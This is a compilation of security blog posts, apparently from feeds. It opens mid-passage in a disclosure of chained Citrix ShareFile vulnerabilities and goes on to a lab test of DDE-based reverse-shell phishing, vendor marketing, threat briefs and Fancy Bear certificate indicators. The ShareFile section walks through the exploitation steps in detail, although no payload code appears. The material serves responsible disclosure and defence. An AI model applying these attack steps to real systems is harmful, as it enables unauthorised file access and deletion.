<!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Item key="operatingsystem" value="Linux" />
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
<ShareID />

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:


However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:


We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.


By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned

DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting

Exploitation of the Microsoft® Dynamic Data Exchange (DDE) protocol is increasingly being used to launch malicious code in weaponized email attachments. A native feature in Microsoft, DDE allows data to be pulled from other sources, such as updating a spreadsheet from an external database. As with many features, DDE can be leveraged for malicious purposes.

Old Dog, New Tricks

Malicious email attachments are nothing new, but the traditional attack vector has been via macros embedded into the files. Macros are simply shortcuts for sequences of commands and/or keystrokes. Studies show that at least a quarter of phishing attempts involve malicious macros embedded in Microsoft Office documents. As noted by the SANS Internet Storm Center, “…attackers are using DDE because it’s different. We’ve been seeing the same macro-based attacks for years now, so perhaps criminals are trying something different just to see if it works any better.”

Apparently, DDE exploitation does work, as observed in several malware campaigns, including distribution of Locky ransomware through the Necurs botnet and also in the spread of the Hancitor downloader. The technique was also used against Fannie Mae employees in October 2017, when attackers sent phishing emails promising free tickets to a Halloween event at a local Six Flags amusement park. More recently, DDE exploitation was found being used in the Dridex banking trojan to execute a shell command to download malware. It was also used in association with the distribution of the Zyklon backdoor.

Of Course, There’s a Metasploit Module for That

The DDE exploit can be created using custom Metasploit modules available through GitHub and other sources. The LookingGlass™ research team tested a module designed to open a backdoor communication channel (reverse shell) between the victim and attacker.

Once the exploit is configured, the next step is crafting the malicious Microsoft Office document. This is done by inserting a coded field that contains the output from the Metasploit DDE module.

DDE exploit embedded in Word Document


Syntax of the code in our test case is as follows:

DDE Exploit Code

The document is then sent victims, typically via a phishing email, and targets Microsoft Word in a Windows operating system. When the victim opens the document, they are presented with a pop-up that prompts them to “update” the document with data from linked files. The default response is no, but if the user clicks yes, the malicious code will be launched using the Microsoft HTML Application Host (mshta.exe) and PowerShell to retrieve the HTML Application (HTA) payload from the remote server.

DDE Exploit Pop-Up Window


In our test case, the code enabled a connection back to our “attack” server. From that session, we were able to remotely run commands and upload and download files. This activity was not readily observable from the victim computer. Interestingly, the connection remains open even if the document is closed.

Established Connection Between Victim and Attacker


File Download Example

Avoiding the DDE Phishing Hook

Unfortunately, infected files are not easy to signature since the exploits can vary widely in syntax and the documents themselves can contain a variety of text and images.

If you are a systems admin or IT practitioner, here are some things you can do to protect your organization’s network:

  • Download Windows Defender (can detect use of DDE exploits and you can turn off DDE itself in the Windows registry)
  • Monitor outbound connections, particularly on unusual ports
  • Phishing education

At this point, we all know cyber threats are become more sophisticated and targeted. Creating a culture of security in your organization and basic cyber hygiene is the easiest and fastest way to keep your networks clean and the bad guys out.

Want more insights like this into new vulnerabilities and exploits? Learn more here.

Marcelle Lee is a LookingGlass threat researcher who is active in the cybersecurity community. Check out her upcoming speaking opportunities here and reach out to her on Twitter at @Marcelle_FSG.


The post DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting appeared first on LookingGlass Cyber Solutions Inc..

Don’t Get Caught Up in the Hype of AI for Security

Don't get caught up in the hype of artificial intelligence or machine learning. Does the product correlate and analyze alerts?

When Nails are Exciting, Everyone Wants to Talk about Hammers...

Sticking with the tool theme from my last post, data is ushering in "better" products in every industry, but why are we so enamored with Artificial Intelligence and Machine Learning?



Soon you'll be able to make coffee where the temperature and grind is unique to the particular bean and roast you are using. The connected coffee maker will crowdsource ratings from all it's owners, will analyze data collected, and produce insights and recommendations which will then be fed back down to your coffee maker - all in support of a better cup of coffee.  

These types of use-cases of data are very exciting to me. The downside is that although I'm a big fan of coffee -- and think this type of technology is pretty cool -- most people don't need to worry about how the sausage, I mean the coffee, is made. They simply want a better cup of joe.  

At the RSA Conference in a couple of weeks, you're going to see many cyber security companies talking about their Artificial Intelligence (AI) and Machine Learning (ML). Here is an example of how one company might speak about their product when you ask them what they do.  "...applies AI and machine learning to automate the correlation and analysis of threats."

Frankly, I don't -- and you shouldn't -- care about their usage of AI or ML. The real question to ask the vendor is: does the product correlate and analyze alerts, and can they prove that their product does it better than their competitors?

Now, you're thinking, doesn't ThreatConnect do analytics and don't you say that your Platform is better because of the data and analytics you are using?  The answer is yes and yes. But, we are honest about what our analytics do and don't do, and we absolutely don't throw around terms like AI and ML with our customers as value propositions by themselves.

Our focus at ThreatConnect has been to leverage our real world experiences, and those of our customers, to scale repeatable processes that help you understand your data. We're less focused on buzzwords that might trigger your news alerts. Rest assured, we've designed these repeatable processes both within the Platform and in CAL™ (Collective Analytics Layer) to make a great cup of coffee. Our data scientists have curated these analytics and statistical models to score indicators, provide insights across datasets, and improve our ability to confidently recommend actions. For the sake of mankind, we hope to never build the fancy newest "Skynet machine learning algorithm." What we will do is use data and analytics (and hype-free marketing) to promote security automation and decision-making in a pragmatic, achievable, and non-world-ending-killing-machines way.  

The post Don't Get Caught Up in the Hype of AI for Security appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

When You’re a Platform, Everything Else is a Tool

Use a Platform to adapt to the changing threat landscape and your evolving security organization

I am a computer scientist and purist when it comes to the vocabulary I use in technical discussions. Often (almost daily it feels like) I find myself talking about the difference between tools and platforms.  

Tools are designed based on predefined requirements and are meant to fulfill the need to which they were designed. Conversely, platforms are designed to enable the continuous design and build process to take place by people outside of the company that built the underlying platform. For example, your smartphone and computer are platforms while your pen is a tool. Even a really impressive pen with multiple ink still a pen.





 Storing Data and making it available via an API does NOT make you a platform!






The ThreatConnect Platform was designed to allow the underlying data model to be extended without development. Developers need the ability to update the data model to account for their own unique use-cases. This provides the ability to quickly and simply integrate with existing products and to bring together multiple disparate datasets for normalization, correlation, and analysis. Integrations with the underlying data model are made possible through multiple APIs that may facilitate data transfer and/or command and control with external systems.  





Having a SDK that allows a developer to more easily integrate with your API does NOT make you a platform!  






The ThreatConnect Platform includes Software Development Kits (SDKs) for Python, Java, and JavaScript/TypeScript. SDKs increase accessibility by abstracting APIs and the complexity of building Apps for ThreatConnect into a general purpose language. For example, the SDK allows Apps to be developed that leverage the entire ThreatConnect data model as well as critical Logging, Keychain, Notification, DataStore, ThreatConnect Query Language (TQL), and Metrics functions of the underlying platform.




Applications or Apps - Now we start getting into a place where your software might be a platform.  Most important Question - Can your customers, partners, friends, and family build on top of your software? If Yes - Hurray, You are probably a platform and if No - You are NOT a platform, and likely a "tool" for thinking you were.  






The ThreatConnect Platform allows anyone to build and run their own Apps that increase ThreatConnect's capabilities by connecting to other external systems and to ThreatConnect APIs. This allows the platform to be enhanced AFTER it has been deployed. Apps take advantage of the default ThreatConnect horizontally and vertically scalable, messaging-driven architecture.  







Is the only way to extend a platform to write code? No, with playbooks or similar designer and runtime capabilities, you can extend the platform based on your own ideas and do so without needing to be a developer.






The ThreatConnect Platform's Playbooks capability allows a sequence of automated or human tasks, arranged as a process, to be configured as a playbook, executed to incorporate automated analytics or human workflows, and measured to support continuous improvement. The processes playbooks, dashboards, and apps can be shared, and utilized by anyone in the ThreatConnect community.

The ThreatConnect Platform was built to adapt to a changing landscape of threats and an evolving security organization and marketplace.  

Over the last 7 years, we built a platform vs. a tool because only one thing is certain in security - change is inevitable.

The post When You're a Platform, Everything Else is a Tool appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Elevating Your Security Posture with Threat-Intelligence-as-a-Service

Every enterprise organization is in a security arms-race that they must win. As technology becomes ever-more intertwined into every business process and every element of the customer experience, the impact of a security breach becomes catastrophic.

Of course, every enterprise already knows this.

The question, however, is what to do about it when the organization must also evolve and expand its technology stack to meet the insatiable needs of its customers and the market.

As the attack surfaces continue to proliferate, enterprises cannot turn away or let their guard down. Instead, they must find a way to continually elevate their security posture and get ahead of the bad actors who are, likewise, continually seeking a vulnerability that will give them an opening.

A more efficient and effective way of approaching cybersecurity promises to help enterprises get the upper hand in this game of cat-and-mouse by identifying emerging threats before an attack begins — and delivering this intelligence in an actionable form without the overhead. The approach? Threat-intelligence-as-a-service.

The Losing Battle for Containment

When it comes to an organization’s security posture, there’s a natural evolution that occurs. The first stage of evolution is all about containment and perimeter security.

In this first stage, the focus is on establishing a perimeter, securing it and then containing any further exposure. This need for containment is so that organizations can define the theater of engagement — ensuring that what’s inside is safe so they can focus resources on protecting the perimeter.

This type of first-stage security posture has been the predominant focus of IT organizations. But this kind of security posture only works when you can effectively define and contain your perimeter — or, as it is also called, your attack surface.

As your attack surface expands or changes, especially when it is doing so at a rapid rate, containment becomes almost impossible. In these situations of an uncontainable attack surface — precisely what is happening now in the era of digital transformation —  the organization must evolve its security posture to the next level. The question is how?

Why Threat Intelligence is in Your as-a-Service Future

The natural response to dealing with an expanding attack surface is to keep doing the same things – just faster and more expansively. This approach, however, is not only exhausting, it’s ineffective.

It’s a bit like trying to keep all the plates spinning on their poles – it’s only a matter of time before it all comes crashing down.

Organizations must, therefore, find a way to identify threats before they ever reach their dynamic and expanding perimeter and then respond preemptively. We call this concept of identify threats before a security event has happened, threat intelligence.

On the surface, employing threat intelligence sounds like the next logical step to proactively protect the organization’s hard-to-contain perimeter. But doing so is much harder than it sounds.

Identifying emerging threats to the enterprise, without creating a debilitating surge of false-positive alerts, requires equal measures of intelligence information, triage capabilities, and expertise to identify indicators that represent a threat to the enterprise.

Delivering effective threat intelligence is a mixture of science and art – and a capability that many enterprises are finding difficult and expensive to build in-house.

Threat Intelligence-as-a-Service, however, promises to deliver the threat intelligence capabilities that enterprises need, without the cost and overhead of building it themselves. Utilizing a managed service for threat intelligence will help enterprises develop this now-essential capability while minimizing the resource impact to the organization.

The Intellyx Take

It may be discomforting for enterprise executives to hear that they need to elevate their security posture and expand their already resource-strapped security operations further afield.

Creating a threat intelligence capability is not the core business of most enterprises. It is nevertheless essential for enterprise leaders to take an active response posture and engage threats far beyond their continuously evolving perimeter. Doing so, however, requires intelligence about those threats and the skills and expertise to make sense from the intelligence data.

This need for intelligence, but the counter-desire to not build and manage a threat intelligence capability is why enterprises are now turning to industry pioneers such as LookingGlass and their threat-intelligence-as-a-service offerings to strike this balance by outsourcing this critical capability.

There is no question that the security arms-race is continuing to escalate. The bad actors are well-funded, organized and ambitious. Enterprise organizations must respond in-kind, but must do so intelligently.

While an enterprise can never outsource its security responsibility, it can and should seek to leverage outside resources that can extend its capabilities in the most resource-efficient manner possible. As the fight between enterprises and those who wish to do them harm continues, enterprise leaders will need every advantage they can muster.


Copyright © Intellyx LLC. LookingGlass is an Intellyx client. Intellyx retains full editorial control over the content of this paper.

The post Elevating Your Security Posture with Threat-Intelligence-as-a-Service appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 27, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Expedia subsidiary Orbitz today revealed hackers may have accessed personal information from about 880,000 payment cards. The business said an investigation showed that the breach may have occurred between Jan. 1, 2016 and Dec. 22, 2017 for its partner platform, and between Jan. 1, 2016 and June 22, 2016 for its consumer platform. Information such as names, phone numbers, email and billing addresses may have been accessed, the travel website operator said. It said its website,, was not impacted. “To date, we do not have direct evidence that this personal information was actually taken from the platform and there has been no evidence of access to other types of personal information, including passport and travel itinerary information,” Orbitz said. The company said it has addressed the breach after it was discovered in March this year. Credit card issuer American Express said in a statement that the attack did not compromise its platforms.”



“Dozens of demonstrators were arrested and three police officers were injured during protests at the Kinder Morgan site in Burnaby this week. Mounties said at least a dozen people were arrested on Shellmont Street Tuesday, many of whom had breached a court-ordered injunction involving the Trans Mountain facility. The arrests came a day after 19 people were arrested at a similar protest, 13 of whom had breached the injunction. One male protester was arrested after locking himself to the front of an excavator being transported on the back of a truck. He was extracted from the lock and held in civil contempt of a court ordered injunction. A woman was arrested after climbing on top of the same excavator and refusing to come down. She eventually did climb down after what RCMP described as “hours of negotiation.””


Information Security Risk

“Facebook says it has suspended the account of Cambridge Analytica amid reports it harvested the profile information of millions of US voters without their permission. The company reportedly stole information from 50 million Facebook users’ profiles, to help them design software to predict and influence voters’ choices at the ballot box. Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of two University of Cambridge psychologists and a Canadian data analytics expert who worked with them. The premise of the collection was through the use of an app, which offered a personality prediction test, describing itself on Facebook as “a research app used by psychologists.” Some 270,000 people downloaded the app allowing researchers to access information such as the city listed on their profile, or content they had “liked.” However, the app also collected the information of the test-takers’ Facebook friends, leading to the accumulation of a data pool tens of millions-strong.”

The Guardian

Operational Risk

“A new variant of the FakeBank Android malware includes the ability to intercept phone calls victims are making to their banks and redirecting users to scammers. This new FakeBank variant is currently active in South Korea, researchers said. Experts found the FakeBank banking trojan inside 22 Android apps distributed via third-party app stores and via links shared on social media sites.”

The post Weekly Threat Intelligence Brief: March 27, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Camouflage & Deception: A New Approach to Threat Mitigation

Organizations are faced with threats that range from annoyances to more sophisticated threats crafted by an adversary with intention and forethought on their objectives. The prevalence of exploit kits and malware and botnet toolkits being shared by bad actors across the Internet and Dark Net makes it easier for actors to build more sophisticated threats.

How can security teams disrupt adversarial activities more effectively?

It is no longer enough for our threat response to focus solely on detection and blocking. We need cyber defenses that will disrupt the threat activities of an adversary.

Security teams have adopted a multi-faceted security infrastructure consisting of firewalls, IDS/IPS, content-inspection, and behavioral analytics defense systems. This layered defense strategy provides protection for the majority of detectable threats that are found using a combination of signature-based and non-signature-based detection mechanisms.

An active defense posture builds on this foundation to disrupt threat activities of the adversary; it examines how an adversary may progress through a cyber kill chain and how we can impact the adversary, causing them to pivot to new TTPs or a different target entirely.

Figure 1: Typical actor activities during kill-chain progression

Increasing the time it takes for the adversary to progress through the kill-chain, the expertise required to launch a cyber attack, and ultimately the cost to execute should be additional security objectives.

Many solutions focus solely on one phase of the kill chain such as detecting or blocking C2 communications. But I recommend a broad-based approach to disruptive cyber defense mechanisms that can be applied across all aspects of the kill chain. For example, which phase of the kill chain are we disrupting? Which aspect of progression will have the most impact on the adversary?

Figure 2: Where disruptive techniques can be applied

There are two disruptive approaches to consider adding to your response strategy.

Camouflage: the act, means, or result of obscuring things to deceive an enemy by painting or screening objects so that they are lost to view in the background, or by making up objects that from a distance have the appearance of fortifications.



Deception: to mislead by a false appearance or statement.



Applying both of these techniques to cyber defense strategy can help:

  • Predicting Attacks
    • Ability to gather low-false positive threat intelligence on adversary tactics, indicators…etc.
    • Ability to more easily understand goals, motives, intent
  • Detecting Activities
    • Ability to gather more advanced detection when other protections fail
    • Early alerting and notification to operations without impact to business-critical systems
  • Disrupting & Responding
    • Easily engage with attackers and their TTPs
    • Easy reconnaissance on the attacks
    • Manipulation of behaviors and interactions that confuse, delay, or interrupt attacker’s activities
    • Increase the cost, expertise required, and impact on the attacker

There are at least two areas to apply camouflage and deception activities:

  • Network-Based
    • Interact with TTPs within the network (e.g. routers, firewalls, proxies)
  • Network-Endpoint-Based
    • Interact with TTPs at the endpoint systems (e.g. laptop, mobile, servers)


Network-Based Camouflage: Camouflaging unpatched servers from vulnerability discovery

Many IT & security teams are often unable to keep up with the continuous challenge of maintaining software patch levels on all servers (both external and internal). In some cases, there are business process impacts that must be considered before the team maintaining the server pushes an update to the operating system or application stack running on the server. These necessarily impact the velocity of patch updates and therefore while those decisions are being considered the servers may remain vulnerable to being exploited.

Network-based camouflage is another way to protects against certain types of vulnerabilities. This method involves obfuscation and camouflage by an intermediary network system configured to do so based on threat intelligence on the vulnerabilities and TTPs that may be used to exploit the vulnerability.

For example, the ROBOT vulnerability is a vulnerability of TLS Cipher settings that can be camouflaged as shown in the diagram below:

Figure 3. ROBOT Vulnerability Camouflage


Network-Endpoint Deception Example: Server Decoys

In addition to camouflaging vulnerabilities on servers and endpoints, security teams can leverage deception techniques. This involves running various decoy systems that impersonate legitimate systems in an organization’s network that can act as an enticement to actors that may have be attempting to breach the perimeter or already have. The endpoint decoy can provide vital insight to the TTPs performed by those actors. As shown below, the decoys can be provisioned to provide attractive results for an adversary to explore and ultimately spend time considering the false information provided by the decoy. This increases the time the adversary is being watched and can provide useful intelligence on their objectives and ultimate goal.

Figure 4. Endpoint System Decoy

There are other defense techniques that can leverage these two capabilities in useful and interesting ways and also extend the camouflage and deception options available to security teams. If you are considering threat responses beyond traditional mitigation steps in your environment I hope you found this background useful. To learn more about LookingGlass’ use of camouflage and deception techniques for threat mitigation, please contact me at @tweet_a_t or @LG_Cyber.


The post Camouflage & Deception: A New Approach to Threat Mitigation appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 20, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 11 –  17, 2018.

This week, we saw a decrease in overall phishing activity – 25% – for the top 20 brands we monitor. With the largest increase in activity being from Computer Hardware and the largest decrease being from Internet Search & Navigation Services. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Computer Hardware (>80%)
  2. Computer Software (>55%)
  3. Electronic Payment Services (>5%)


The top 5 industries that saw a decrease in phishing activity this week: 

  1. Internet Search & Navigation Services (>50%)
  2. Telecommunications (>45%)
  3. Storage & Systems Management Software (>25%)
  4. Banking (>20%)
  5. Social Networking (>10%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.

The post Weekly Phishing Report: March 20, 2018 appeared first on LookingGlass Cyber Solutions Inc..

A Song of Intel and Fancy

A case study tracking adversary infrastructure through SSL certificate use featuring Fancy Bear/APT28/Sofacy.

A long time ago, in a galaxy... No. Stop. We're not doing that anymore. Instead, we're pivoting to Game of Thrones, or A Song of Ice and Fire for you bookworms, because the fantastical realm provides great material we can relate to cybersecurity.

This research builds off our previous work using SSL certificates and splash pages to proactively identify Fancy Bear infrastructure. We identified a SSL certificate subject string that Fancy Bear has used consistently since 2016, which further illuminates their infrastructure and registration tactics. Our hope is that in addition to the indicators themselves, our readers will apply these techniques to their research on other adversaries.

We'll walk through the process of how we conducted this research, which used ThreatConnect, Censys, Farsight Security Passive DNS, RiskIQ, and DomainTools. To date, this line of research has identified 47 IPs, 46 domains, 33 registrant email addresses, and 47 SSL certificates shared in ThreatConnect in Incident 20180209C: "C=GB, ST=London, L=London, O=Security, OU=IT" Certificate Infrastructure. It also underscores consistent Fancy Bear tactics including:

  • Use of small or boutique hosting service providers such as Domains4Bitcoins, ITitch, and NJALLA.
  • Minimizing the reuse of email addresses to register domains.
  • Regular use of email domains sapo[.]pt, mail[.]com, centrum[.]cz, and cock[.]li or privacy protection services.
  • Domain registration and SSL certificate creation times that are consistent with an actor operating in Moscow.

The Watchers in the Night

Everybody thinks they are House Stark material, but we would assert cybersecurity personnel are more like the sworn members of the Night's Watch. You are the watchers on the firewall, the sword in the dark web, and the shield that guards the networks of your organization.

If we're being honest, the ThreatConnect Research team and cyber threat intelligence analysts at large, are most like... wait for it... Samwell Tarly (none of us harbors the delusion of being Jon Snow). Tarly is dedicated to aggregating and analyzing intelligence on threats beyond the wall -- the Night King and his White Walkers -- to better understand how the Night's Watch can react to them and proactively address them.



Looking for Adversary Infrastructure Using a Common SSL Certificate Subject String

In our recent efforts to proactively address Fancy Bear, we reviewed SSL certificate information in Censys for domains and IPs using a "Coming soon" splash page consistent with previously identified Fancy Bear infrastructure. We found the same subject field used repeatedly -- "C=GB, ST=London, L=London, O=Security, OU=IT, CN=(domain name)" -- as shown below for space-delivery[.]com and webversionact[.]org.


Censys SSL certificate information showing consistent use of subject string.


This subject line indicates a SSL certificate likely created using OpenSSL, where the creator assigns values for the country (C), state (ST), location (L), organization (O), organizational unit (OU), and common name (CN). It is important to note that the common name is intended to reflect the domain name where the SSL certificate is being used, but in our research we found several instances where this domain name was misspelled or altogether different from the domain where it was used. More on that later.


Radiating out: how common is that subject string?

Next, we needed to get an idea of how widely this string is used and what other infrastructure is using similar SSL certificates to gain insight into more possible Fancy Bear infrastructure. Again using Censys, we found 47 certificates that have the same SSL string. In Censys we also queried for IP addresses that host a server using a SSL certificate with that string. The latter provides a view of active infrastructure, while the former can be used to find both historical and active infrastructure.

Censys certificate search results for identified subject string.


Careful though: other individuals could easily use OpenSSL to create certificates with the same subject fields; this alone is not sufficient to identify Fancy Bear. Using ThreatConnect's Analyze function we saw that at least 23 of the specified common names have been associated with Fancy Bear attacks. Many of the remaining domains have also been identified through our ongoing research into name servers that Fancy Bear uses. This increases our confidence in assessing that SSL certificates with that subject string probably are associated with Fancy Bear activity.


ThreatConnect Analyze results showing indicators that already have information in ThreatConnect.


Stitching together certificates, IP addresses, and the right domains

Censys SSL certificate information for 46ce0b05f302e0d855e9cc751100299345466581.


At least 39 of the certificates identified in the previous query are no longer in use, but we used RiskIQ to search for the SHA-1 hash and identified the IP addresses that previously hosted a server using that certificate. For example, searching for the previously used SSL certificate 46ce0b05f302e0d855e9cc751100299345466581, we saw that it was used at the IP


RiskIQ SSL certificate information for 46ce0b05f302e0d855e9cc751100299345466581.


Reviewing this IP address in ThreatConnect using our integration with Farsight DNSDB, we saw that this IP address hosted the domain remsupport[.]org. This is a notable finding as well because the domain does not correspond to the ecitcom[.]net that was specified in the common name field in the certificate subject, so we took an extra step to make sure we matched up the right certificate to the right domain.


ThreatConnect's Farsight Security Passive DNS integration results for


Conducting this same process for all of the SSL certificates, we came up with the following list sorted by the SSL certificate's create date/time:

SSL Certificate SHA-1 IP Hosting Certificate SSL Certificate Create Date/Time Domain Hosted At IP or Common Name in SSL Certificate
62e1045ae816b5f44cb43ab52ecb8e4534b63147 2/20/18 12:19 webversionact[.]org
1e185ee8ac3c3eafcc2b4d842ed5711b9c62a305 2/8/18 7:57 mdcrewonline[.]com
43df735cfea482ffc27252ae08c94f359c499f69 1/31/18 11:52 cdnverify[.]net
9d73605a130c377909fe463bc68ac83f73c04a46 1/23/18 11:28 nomartung[.]org
fcc696070de34157a02c46aa765c3c7969677fea 12/21/17 15:55 europehistoricalmuseum[.]com
126e9d0cf80badf7810859fc116267d40ed1c58b 12/21/17 8:34 supservermgr[.]com
9153efa5001c67fdce4bb861f8758cd90b072901 10/30/17 13:44 satellitedeluxpanorama[.]com
739e8cc0519aeeb8dd1417e45f9577bd394684f0 10/30/17 10:41 webviewres[.]net

10/30/17 9:43 vermasterss[.]com
89bba1abb0078ffab8dbf2cfa85697b147d8223d 10/27/17 7:46 funnymems[.]com
3f17cbb5792e6b9ff8607b23bbc8ad40c735819c 10/20/17 10:21 space-delivery[.]com
6860d7aabef2f2382476d9a350c225956bf351c7 10/17/17 8:51 travelbern[.]com
b86f517d347e53b3b7116682d7f36a3b77fa8bdf 10/16/17 8:41 space-delivery[.]com
46330eac674b27a4f34ba6864a74bfef59998e5c 10/4/17 11:46 myinvestgroup[.]com
551a8e0b504fa19e643dae39002bd0b91a5cfa7e 10/2/17 14:29 nanetsdeb[.]com
2a71f7ed0de7b89f4a10d329227898edcd3af6ce 9/29/17 13:52 nanetsdeb[.]com
b99346a7f7809578330e4763329209c2381d2f95 9/29/17 11:48 fastphotobucket[.]com
ea3198f2ef8685a6f8a1303a55fdb7062a6f30b0 7/12/17 13:05 rapidfileuploader[.]org
b64268d418592d481e13ed6aa4dc233b9dbd486d 7/7/17 7:39 viters[.]org
9aa7508f1be201120511b1a4bc91e653c82df924 6/28/17 12:57 mvtband[.]net
d514a2a79a0e1a046846963797319fe8e00cdbeb 4/13/17 7:43 spelns[.]com
2e53a96a63c8cc17f2824bcdf7c93d64dad45170 4/3/17 13:14 wmdmediacodecs[.]com
b07d766664cfa183dba3ee32ab35ed32c7f501c2 3/29/17 10:09 acrobatportable[.]com
f9abac0f831e9ea43727a02810ebd6969e8e5951 2/3/17 9:06 lgemon[.]org
37ab57a30ffd3826a24acd2b3b596d7bf160960c 1/31/17 8:41 lowprt[.]org
